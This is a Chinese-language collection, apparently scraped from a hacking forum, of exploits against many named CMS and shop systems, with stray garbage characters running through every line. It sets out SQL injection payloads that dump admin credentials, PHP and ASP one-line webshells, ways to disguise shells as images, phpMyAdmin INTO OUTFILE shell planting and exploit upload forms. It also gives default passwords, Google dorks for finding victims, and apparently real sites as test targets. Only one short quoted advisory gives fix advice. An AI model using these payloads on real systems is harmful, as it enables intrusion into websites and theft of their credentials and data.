启航企业建站系统 cookie注入漏洞通杀所有版本
7 `) c- N$ \% E4 M9 U5 B) Y7 T. D+ e1 [+ m5 q2 w' a" m3 u$ V
直接上exploit:
3 k% W7 h0 @$ o6 |# ^javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));1 a. s% X4 g& {
test:http://www.tb11.net/system/xitong/shownews.asp?id=210$ O5 i& a- |( B
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ I6 ?" T( H- [) m2 fAsprain论坛 注册用户 上传图片就可拿到webshell1 B. x9 Z, I- q G% I i4 i, T
9 ^, O" G9 `4 x5 I; L# t) y) I& R: Q
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。; I% |( H$ U3 h2 D8 u6 i
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
; }; J2 O5 ^0 I# h6 G/ b* I6 J% z, X2.gif 为一小图片文件,一定要小,比如qq表情图片# \3 n8 D, i, v0 w- s
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用- h8 B; I1 z3 P' c. M( A) R
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
- v. H5 m8 o8 c6 ~9 I! w. {5.q.asp;.gif
4 `% m8 [$ P1 ]google:Powered by Asprain
" Z8 N9 ^6 d& S--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; m( X8 S; Y/ y5 c2 r J' q b5 @+ |6 u: x) n0 C! ^8 U4 j0 Q9 T) R
ShopNum1全部系统存在上传漏洞。
* ]' ~! a5 d: U; u1 ]! v8 X! {2 j% P" e1 |' u$ ]
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。% I+ c6 J1 ` {- L
按说明 提示登录后台。。0 P2 [) Z" u" }: p5 ]" I9 e. l
在后台功能页面->附件管理->附件列表
, j1 `0 N; f$ Z0 ~4 o/ u可以直接上传.aspx 后缀木马
& L) k$ E# V7 j4 N ~http://demo.shopnum1.com/upload/20110720083822500.aspx
$ K, R6 y3 ~0 L/ S. v--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ E1 J& E! [% c/ q% D+ B; E- Q: C
5 {: c4 z( {) l" A- P5 R s牛牛CMS中小企业网站管理系统 上传漏洞/ y6 ]! o. @! N$ E- y
1 Z! L" o/ E: C9 M
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。- C( R" S4 C: ~9 M7 }; X( L* |
后台:admin/login.asp/ R7 V& H7 W2 S- A: D7 ?
ewebeditor 5.5 Nday5 D X8 L8 e4 S
exp:$ U4 ?( m% \4 P( x
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?6 c2 f) L. U% U: |
<input?type=file?name=uploadfile?size=100><br><br>?. K; {1 n7 Y( M* _+ t5 y6 d9 c8 k& ]
<input?type=submit?value=upload>?
3 @- H b- K; @1 v5 ^</form>
- @- o7 T' `& pps:先上传小马.
1 f, \" u7 P4 o- U# Finurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
& h2 S) c8 E1 z9 h9 n$ s
9 B. z- L: _; D# {, z M4 `--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ a5 j" a; R+ w" _- B1 s1 G
! t! K6 E, r, n9 Q( uYothCMS 遍历目录漏洞4 n; S6 g$ C" p& D' `4 h
- N, k$ E( t' U# D1 X* s优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
# ]1 _; S5 }& ]默认后台:admin/login.asp
* q3 B: R7 H7 v2 x遍历目录:1 N+ O/ j5 w! t+ n$ t! i
ewebeditor/manage/upload.asp?id=1&dir=../0 V+ w h5 b1 |) v$ p' P, a
data:
1 m; i) o( b; ~/ R( f! M% xhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
' H: }! y& w) ]+ W* G1 ?0 ^1 f--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" y o! G/ _: @# w" ]4 Z
' o) }$ z2 B, w& _6 L6 eNet112企业建站系统 1.0- @8 W3 L/ e/ @# B4 i
/ \ [0 m3 y. Q1 ?$ p' A% n
源码简介:
7 e: {. E& r( { h6 GNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
5 X" W. d* y$ |' [$ j* w0 t A& A添加管理员:. R# |1 e+ `0 P0 w& g r) |
http://www.0855.tv/admin/admin.asp?action=add&level=2
& O" ]. n6 J9 n其实加不加都不是很重要,后台文件都没怎么作验证。
8 E# K1 K2 J9 }) C( D- J1 @上传路径:( t/ r6 h- K ?4 d% V8 {! |8 S
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
# N3 l- l0 P/ R- T, l6 @: \http://www.0855.tv/inc/Upfile.asp?Stype=20 a6 U H Z: }. w" P4 r
怎么利用自己研究。8 U4 N5 `7 O- X
遍历目录:
4 @' F* V* M0 J2 S8 M! ohttp://www.0855.tv/admin/upfile.asp?path=../.. r# J; I. h# B) E. y- W
如:, ~! w" x g( Q& b
http://www.0855.tv/admin/upfile.asp?path=../admin- W0 }7 A O' P" C$ K9 G
http://www.0855.tv/admin/upfile.asp?path=../data2 i+ G2 I" F0 U* @; J
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------& Y& r; u9 k+ V8 d
/ m3 K8 `; D, M$ ^$ @* d
易和阳光购物商城通杀 上传漏洞
, B5 W+ a7 g+ Q7 s! ~9 @
: i9 I. d8 Q% h7 G' X( O' s前提要求是IIS6.0+asp坏境。
* S4 v' }2 s) a5 A+ @3 _漏洞文件Iheeo_upfile.asp % I, }) b5 ~: y; v
过滤不严.直接可以iis6.0上传/ _- l1 c, x3 Y) f
把ASP木马改成0855.asp;1.gif& ?1 i9 r/ k+ i! e
直接放到明小子上传
9 r, i' n% {( j" Q. XGoogle搜索:inurl:product.asp?Iheeoid=1 Z3 {. ?. m2 ~) B
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( y) i0 G& M3 X4 E
8 w6 `, b+ B3 n3 X; bphpmyadmin后台4种拿shell方法
" V# {2 ~0 ^- r% V( Y7 {- `+ {" R4 I
方法一:
0 {2 _! _0 S( @, ]8 i7 aCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
- q/ f5 r" ^9 bINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');. s3 q5 O3 u' e' t- j
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';' _* c4 q/ d6 v2 F$ C3 S
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
$ U! i4 A$ l/ H7 {4 n; L Q, ?2 \" e* }一句话连接密码:xiaoma- R; H# b. g2 s
方法二:# g9 f$ W8 f K2 b/ z* @- r x
Create TABLE xiaoma (xiaoma1 text NOT NULL);
; S8 }1 j! @/ V- Z+ n7 \5 e7 R lInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');7 @) y$ p- R4 T
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';, i9 Y- o% V a( \5 o* @
Drop TABLE IF EXISTS xiaoma;
3 E" p& }. c3 x& V6 H5 [0 o方法三:
7 k6 d8 o+ j" |+ U% k: \2 d) H) n读取文件内容: select load_file('E:/xamp/www/s.php'); S# m2 w4 W+ B7 G
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php', f# T' R" G7 n& a, Z' D, |
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
5 ]6 j& C* \; Y* I0 C方法四:/ ^) ]4 h5 j( S$ T( c% ^
select load_file('E:/xamp/www/xiaoma.php');8 b2 r7 `2 M5 {1 y4 F" p5 P
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
) y8 d- q$ I* I3 N+ ^- p然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
0 u7 g0 G; N; n--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 z) \$ g! B, E' p6 F
8 N8 u4 w+ b7 s) r* ?传信网络独立开发网站源码0day漏洞8 E. m2 Z! d d; I# _ h: G
' b; {: v: y1 X: L后台system/login.asp
8 c& P" n. k! x, ?' _7 `6 |. t进了后台有个ewebeditor
7 \' x* J ~ i# @2 GGoogle 搜索inurl:product1.asp?tyc=
: i6 r3 p0 F, J, Y+ ]0 R; E编辑器漏洞默认后台ubbcode/admin_login.asp# E- M% @1 O) I4 M" b
数据库ubbcode/db/ewebeditor.mdb, c- R7 I: i1 G4 m3 O) P" N
默认账号密码yzm 111111+ u9 ^2 Q4 O! n
" S9 J* |, @) k0 n( B6 Q9 H
拿webshell方法
" L% ~9 ~0 v1 [登陆后台点击“样式管理”-选择新增样式 ) M: {6 x8 E% _! c
样式名称:scriptkiddies 随便写 3 D" {1 t G B0 N5 E, t; a
路径模式:选择绝对路径
- I2 g* S+ }8 s图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx9 a; Q# I8 J% C4 N9 `- w1 g1 |' q
图片类型比如就是我们要上传的ASP木马格式6 S& Z' c9 b1 M5 k5 u
上传路径:/
6 a1 f' l3 m) J图片限制:写上1000 免的上不了我们的asp木马
4 w9 Q1 u7 i |! d; @2 s, @! f上传内容不要写
# z% r; I! u) w" [, t) N可以提交了
0 d( C8 K, A( K- Q样式增加成功!
4 b+ C% A a* [ z返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 ( h0 |# ^( }- E
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置4 I& Q& R. [& e+ E* |2 N3 ^
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
( j! q( D+ q& [9 f# |! H7 }+ a1 r! E上ASP木马 回车 等到路径1 e% t& c( `/ N6 U# i0 }9 |9 P
* b. j! a6 d. a' O$ _' A. p8 j& A/ U后台:system/login.asp+ H7 e% C6 C) p* g
Exp:
* I% p9 \. x' a% V8 E" \. |3 ~and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master( c6 K5 k3 k) m$ i, E
测试:
1 Y& I, W+ u' i! ]http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
) @# F" T' Q& m4 `( P9 R" T# Phttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
; t3 {; R; b6 F--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- \' ~1 m5 L# ~* l
' ~8 ]4 L B3 N. Nfoosun 0day 最新注入漏洞
\; i- Q' P) G$ z6 ~; Z3 K* t% t0 q* G6 m
漏洞文件:www.xxx.com/user/SetNextOptions.asp) ]' {) u7 v5 e0 Z$ ~5 k, p' b1 ^
利用简单的方法:
- n) g! T, o- V( D暴管理员帐号:" i$ a4 y- X1 K9 W" y+ _, |
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin- v; y; Q. t6 g% H$ U9 R+ g
暴管理员密码:
: n& U- w& F- Y* j: D. G/ G+ j0 \http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,* Z0 L; e* F; |& _0 X+ ]" Q8 \, Q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 `2 L; T$ X2 E" F5 I
+ e6 Y9 _/ S3 q* @3 v- h0 q网站程序的版权未知!
1 C4 p9 U& i% p& j0 s i+ D( b7 s0 J
默认网站数据库:; X$ [, v0 \0 u
www.i0day.com/data/nxnews.mdb
) O; Z' p9 [" t# @3 hewebeditor 在线编辑器:
@& l' ?( y4 v" @编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
. B7 C- V4 e5 P登录地址:ewebeditor/admin_login.asp; d4 L$ J" G# h' f. ?% f
默认密码:admin admin. \4 K1 c, C0 F
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
T" [9 b7 `6 @ A1 K l3 A& Z
9 p& j$ k: d1 {5 |" q4 ISql注入漏洞:3 {+ n2 Y l3 ]5 T1 J+ c
http://www.i0day.com/detail.asp?id=125 ?: V0 V5 c) ?. [
exp:
% E# C4 l, V& @4 @: k3 A" {7 Eunion select 1,admin,password,4,5,6,7,8 from admin5 H! I+ ~7 {& \* E0 k
爆出明文帐号/密码
1 Q9 Y# x( ~. j, x
. _4 d# ]1 t- ^8 {1 K5 x7 }上传漏洞:
: G+ S9 i n5 m0 `, n) b G后台+upfile.asp
/ q; n! w8 j6 n; k5 F$ Q' y如:
2 X9 ]& P' N2 J7 |$ }* f9 s7 Bhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。% L! w. Z' E7 i3 O& C
shell的地址:网址+后台+成功上传的马
5 k6 [* z4 {) l& egoogle:inurl:news.asp?lanmuName=1 u) [! m% X& ~4 j/ {5 V
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- q& J0 m$ q6 j' s% m& S+ K5 K
! d3 o8 R8 j5 I- L5 cdedecms最新0day利用不进后台直接拿WEBSHELL$ N- a% I9 C0 [5 L" V. Y) |
" {; u f$ L T$ P& u9 H! U T- _. E
拿webshell的方法如下:
( P) L( m% Q, y- s( v网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.- i. [$ \+ H/ `$ X6 m
前题条件,必须准备好自己的dede数据库,然后插入数据:( i7 i$ m+ l+ I% D+ v! O; x* p J
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
. J# d- h4 ^2 m) K+ j- T( n" Y4 l: C# i
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。5 G0 n8 N+ t* ?! ^8 W
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">1 G5 n4 O* g5 [7 d2 U. L2 v# }
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />1 L0 m* Q; {, F3 F) y& {+ P
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
# n8 H$ B- G# L4 ?! G, n<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
0 z1 P' y5 S2 x% a) o( E. U<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
* t" K! d% c# Q% c/ ^6 M& z) _3 D<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />3 |: b! X, u/ e% r) g
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />% j" Q# O, N5 k: ~; E, k e5 K
<input type="text" value="true" name="nocache" style="width:400">
+ t# n. b/ c N9 P<input type="submit" value="提交" name="QuickSearchBtn"><br />) o" A) I8 L8 z
</form>
" H/ z' s7 r' k- z<script>+ L0 g& V( y, e% [
function addaction()
% \+ F- ~! K4 p* Y) H# A{5 c/ }1 V6 a& B% P- L. {
document.QuickSearch.action=document.QuickSearch.doaction.value;
; L9 E7 }$ \; x z}
4 E* ?+ [4 M7 C) ~+ q) N; W</script>
?0 F5 ]' v$ {/ V& J; D! U, R-----------------------------------------------------------------------------------------------------------------------------------------------
7 o: b) y0 T6 ^! W) f2 u; Z4 w
1 {) M. @7 o5 [1 o* pdedecms织梦暴最新严重0day漏洞! Z. G% ]! f0 o: e
bug被利用步骤如下:
# X' w# q+ B+ {6 Z- E' ~http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root) v4 A6 ?1 u5 u7 u+ }+ t
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。, E' b3 y0 g% R2 m
-------------------------------------------------------------------------------------------------------------------------------------------2 t/ e9 m8 E8 b6 q3 W1 M8 i# w
, R" D, W9 U: f* ^( r2 ?
多多淘宝客程序上传漏洞 * B( \/ h" y5 d. t. J7 V/ Y% b% I
漏洞页面:
7 k* Y9 v9 G fadmin\upload_pic.php
+ G) e/ W4 s+ J+ A/ b传送门:2 k7 z& ~) z7 \ a0 W2 k7 f
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
$ v7 B' w3 y9 r0 p5 S e5 ZPS:copy张图片马 直接 xxx.php 上传抓包地址!
: r i$ B& k n+ X1 _, A------------------------------------------------------------------------------------------------------------------------------------------------------
, X9 ?) o& c2 U1 U
9 y2 ? i" B& {/ J0 J8 x1 U! `无忧公司系统ASP专业版后台上传漏洞
( \8 _+ C% ~% s+ ?& a漏洞文件 后台上传% Y- ]2 m/ M& o1 j! a
admin/uploadPic.asp
) j q8 F7 l8 Y @8 H7 A! S+ t漏洞利用 这个漏洞好像是雷池的
$ o+ T- L' Q* Hhttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
8 s3 U$ }5 |! c7 k, A0 j) q* p等到的webshell路径:
& ~8 j3 C+ ]- Y4 d K% l+ R/UploadFiles/scriptkiddies.asp;_2.gif+ T/ A" s) \' Y) G( s
---------------------------------------------------------------------------------------------------------------------------------------------------
# E2 q% F. ?$ ^# }( H# T" H
% R* A- i' R/ j住哪酒店分销联盟系统2010
( w, M+ K1 i# X2 \6 u0 ]& nSearch:
/ k3 \/ N( O) O" R2 yinurl:index.php?m=hotelinfo
9 ]9 t' B; q; @5 n2 hhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin! E+ ?1 |& i& A) y: I3 A. Q
默认后台:index.php?m=admin/login
+ J3 t7 o" L. F* p. M7 \+ ]1 d# J--------------------------------------------------------------------------------------------------------------------------------------------------
( q" ^; J% X) B' P
! S' Y9 F; S* F9 ~" J* zinurl:info_Print.asp?ArticleID=
; S- x) U& e0 S' Y: V0 H后台 ad_login.asp; @( S3 k+ l$ c1 T, n2 H2 q* ]; o
爆管理员密码:
( b) C, ^/ A) a8 Aunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin: [: z y- B" z4 X0 x/ K
------------------------------------------------------------------------------------------------------------------------------------------------------------
- C6 y) n1 o J( j: O6 ~
. j# J( V' C/ v, I% R) K# h! R搜索框漏洞!1 c4 m9 I7 `+ B9 [, P
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='' }$ x: J& V( J1 H$ @/ p
--------------------------------------------------------------------------------------------------------------------------------------------------------) A- p& O: X: T: s3 V* R4 |2 F& h
) P Z2 ~0 V7 X, m. H" L
关键字:5 J$ \3 B% X2 |# t' ~
inurl:/reg_TemletSel.asp?step=2
4 ]2 B O3 Y6 N1 y或者
) t6 d. u+ ~0 |$ d电子商务自助建站--您理想的助手
1 U- y, }7 a2 u' V-------------------------------------------------------------------------------------------------------------------------------------------------
+ p$ T0 Z7 |! Z' Q2 H& W5 W# l. P( N* p5 c7 [% w6 B5 k8 v
iGiveTest 2.1.0注入漏洞/ o8 r- F, n$ W2 c1 H' I I
Version: <= 2.1.0" Z9 e* T3 X# [. _/ J- I
# Homepage: http://iGiveTest.com/; P7 `7 `/ E1 d* p
谷歌关键字: “Powered by iGiveTest”
0 @1 m! Z2 [ q5 _+ @& I1 G随便注册一个帐号。然后暴管理员帐号和密码: ^* T1 V3 k' p* A5 H! i
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
5 M; c6 x* F! R) ?------------------------------------------------------------------------------------------------------------------------------------------------
- \# n/ M( y0 Q7 A1 u! H3 w! }% N+ M) F7 {/ }% W; z/ }
CKXP网上书店注入漏洞
6 n3 f+ c U, G& j( L8 p工具加表:shop_admin 加字段:admin
2 ~/ L) L( W9 ?. k! Y后台:admin/login.asp 5 n# z% T8 b k: N7 Z, {
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/. T- Y: f8 u% p
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
1 G( l, y$ T. J& P% \--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. t* r+ x- k U7 p+ C( N9 X' n/ z h, C7 \( I
段富超个人网站系统留言本写马漏洞
. Z- r- Q( A, b; Q源码下载:http://www.mycodes.net/24/2149.htm- d) u) E: }0 s- K) \
addgbook.asp 提交一句话。0 _3 ]- h4 x/ Y% d, j1 ^6 \- ]! o
连接: http://www.xxxx.tv/date/date3f.asp
- }8 W8 \: y$ b) Mgoogle:为防批量,特略!1 e1 S f( s- [1 q% v
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------* I( S% p! Y* u6 p! f
5 V% \3 w! D8 X5 i @' n, `
智有道专业旅游系统v1.0 注入及列目录漏洞
& f7 e" p/ e7 _ p& { h; n默认后台路径:/admin/login.asp3 P, M5 I8 N, d
默认管理员:admin/ Y/ J/ l* H5 V2 E% {& G6 K
默认密码:123456& c9 d0 V C2 W3 ?! i3 Z$ G" O
SQL EXP Tset:) a0 ~; E1 g' a2 o1 O1 E) W
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
7 d1 j6 O2 Y. v8 f! c------------------------------------------------------------------------------------------------------------------------------------------------------------------------! @3 j5 ?0 F# H& F/ }* H
m3 y& b1 }/ l
ewebeditor(PHP) Ver 3.8 本任意文件上传0day$ K/ _; l$ A2 [
EXP:- U/ B9 K" p1 \) l+ L: i& H( k8 i
<title>eWebeditoR3.8 for php任意文件上EXP</title>
|. ]& ~1 [7 @" Q; y7 s. j<form action="" method=post enctype="multip
7 x7 p6 f j" ~: w% \& E! Dart/form-data">
) l/ C* a8 g0 R& y& z8 c. t) o<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> $ ~5 K0 S6 l, u% I& Y# j
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
8 r$ \) j. m) S# E<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> " f% x0 u0 f' }# O! |" {, z7 L' u
file:<input type=file name="uploadfile"><br> : U5 c7 k8 Y. Y5 A6 M
<input type=button value=submit onclick=fsubmit()> ! a( [* f* P% Z# b& i
</form><br>
" p: t# p, V4 m9 i$ P<script>
3 \( O% H7 X/ j6 s3 H6 dfunction fsubmit(){
: L4 y+ g* p( V4 G7 |form = document.forms[0]; ( H' _. R7 R3 z0 Q
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; 0 r5 O* r! }- p. s) ?" p r
alert(form.action); $ [* k2 ]. |+ k6 E1 M
form.submit(); ) R' a& |: A' b w2 U; f# }) Q$ }
} # z/ i2 N$ Z0 e% H4 m
</script>; o+ J, A3 ~) U( E2 b2 h& Y
注意修改里面ewebeditor的名称还有路径。
1 Y: w7 ]# W* V9 [---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. f4 K8 @4 S% Y6 x% @ Y. D% V# ], a0 ]% y4 V7 C1 u0 F, _
提交’时提示ip被记录 防注入系统的利用
& V. J: Q# L; \! k* R3 k- E网址:http://www.xxx.com/newslist.asp?id=122′+ D0 q( O* p4 o
提示“你的操作已被记录!”等信息。6 L5 B# \+ |+ C8 I+ f
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。! x, G" F4 K2 s* [
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 j- y6 y+ H9 W; x4 f V' j7 p/ j$ A. A# V! c$ r
西部商务网站管理系统 批量拿shell-0day
$ F5 M# _2 q2 N6 }* L. G* s8 g这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
# [7 S' D1 ~3 R6 z7 D; f' F, I1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛1 h. |9 v4 \0 P' }1 y9 f* G8 l
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
Z% ^& j2 q; S4 `" `2 @3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
/ l/ e1 N; a. b& i0 ^: l; ?---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. e# [/ F, K. q/ x. Q$ r q( h) Y Z5 H* H' B
JspRun!6.0 论坛管理后台注入漏洞9 j# [& f7 ~. n) ~; d
3 J. u5 V: ?2 z9 z: n
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:# ^" k C6 S2 S( R
JspRun!6.0
. y- n; P A, a: d( u漏洞描述:
" U4 _5 l/ k4 c$ \JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。$ s' N* g# [* {7 e% l3 P8 f/ M
在处理后台提交的文件中ForumManageAction.java第1940行8 R* |2 W1 V% i+ m' _$ O
String export = request.getParameter("export");//直接获取,没有安全过滤- s3 ], x0 N! q# F" V
if(export!=null){% ^ D2 E2 I: B: s0 ^5 t n0 a
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...6 E4 ^" E- W) G5 {# } I
if(styles==null||styles.size()==0){ L6 u! z% ?: k3 b( M/ V1 c# Q. G7 \+ \
<*参考$ g3 ^0 f' v0 G
nuanfan@gmail.com& U& t' Q2 X1 Y1 @
*> SEBUG安全建议:
0 X5 |9 h( A" x* }/ z' F; rwww.jsprun.net: A+ V6 w/ l! V6 O/ k" Y5 c
(1)安全过滤变量export
) ?; P; [' m$ Z7 l# c(2)在查询语句中使用占位符
g$ m: K' n8 w3 O+ L3 o+ B------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; V7 {7 D9 q* D$ y9 A, \7 d# Z% Q8 E% j
乌邦图企业网站系统 cookies 注入
3 {2 Y: A1 E! w- |' a. I/ w M: c" I1 ?* [! Q" i4 z
程序完整登陆后台:/admin/login.asp
2 w8 m" v% i& e. {默认登陆帐号:admin 密码:admin888
, _: c! P- v6 D% g; j' T4 \语句:(前面加个空格)( w# L* t6 c% Z2 Q" W# P, s& {
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
+ L' a# q/ c0 U: L5 X7 k0 b或者是16个字段:
& X0 n% K9 d1 {' X2 U6 ~2 G7 ^; wand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
( r G4 E7 V4 W R& R' N爆不出来自己猜字段。
6 `% w) g- a8 d9 x( g/ t注入点:http://www.untnt.com/shownews.asp?=885 Z$ B: L3 A9 I/ E
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
, b; M3 Y; h2 S1 x5 i4 x关键字:
/ X0 o( M. L5 q1 a& F# Y& Q1 B* _inurl:shownews?asp.id=( v% G/ S- b) m- l& K8 a
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 ]+ m7 _! o2 [ y" c
( [+ j& c. K. R: F
CKXP网上书店注入漏洞
5 j. S$ U; x$ N3 u! B) {. `6 D5 `8 p, n
工具加表:shop_admin 加字段:admin
& y! {3 { m2 z- E- Y后台:admin/login.asp
# `( R) \2 V4 }3 v+ R登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
* |- b( z1 {! ?- o6 s; R, y1 finurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息/ Y' V. @' N9 [7 ~# v5 z: R
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------! n$ t) H. m6 k: N1 x
7 O" S8 L8 W1 v+ UYxShop易想购物商城4.7.1版本任意文件上传漏洞
1 ?" l8 `8 ]% A9 U3 r
+ F% M" ], |( @, I. @: C& Y+ khttp://xxoo.com/controls/fckedit ... aspx/connector.aspx, }2 k& x) [+ y" b1 N1 X( M
跳转到网站根目录上传任意文件。/ M7 }8 R, k; g' ^) h
